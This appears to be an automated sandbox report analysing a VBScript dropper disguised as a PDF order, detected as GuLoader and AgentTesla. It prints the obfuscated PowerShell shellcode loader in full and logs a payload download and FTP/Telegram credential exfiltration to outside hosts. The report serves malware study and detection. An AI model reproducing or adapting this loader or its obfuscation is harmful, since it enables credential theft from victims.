Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name:Ordine n.47201 pdf.vbs
Analysis ID:755275
MD5:c8290bc8659c4a6a45ccd1af9268e400
SHA1:d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256:f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags:agentteslavbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5780 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5864 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Ordine n.47201 pdf.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa36:$s1: .CreateObject("WScript.Shell")
  • 0x3cde2:$p1: powershell.exe
  • 0x49c55:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        amsi64_5812.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
        • 0x1a:$s1: .CreateObject("WScript.Shell")
        • 0x72:$s1: .CreateObject("WScript.Shell")
        • 0x1db:$p1: powershell.exe

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCT
        Timestamp:192.168.2.7185.31.121.13649726613132851779 11/28/22-14:53:16.335427
        SID:2851779
        Source Port:49726
        Destination Port:61313
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.7185.31.121.13649725212029927 11/28/22-14:53:16.290035
        SID:2029927
        Source Port:49725
        Destination Port:21
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2
        Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

        Networking

        barindex
        Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49725 -> 185.31.121.136:21
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49726 -> 185.31.121.136:61313
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
        Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
        Source: global trafficTCP traffic: 192.168.2.7:49726 -> 185.31.121.136:61313
        Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.2.7:49725 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownDNS traffic detected: queries for: qwedft.gq
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AA09A recv,
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2

        System Summary

        barindex
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo 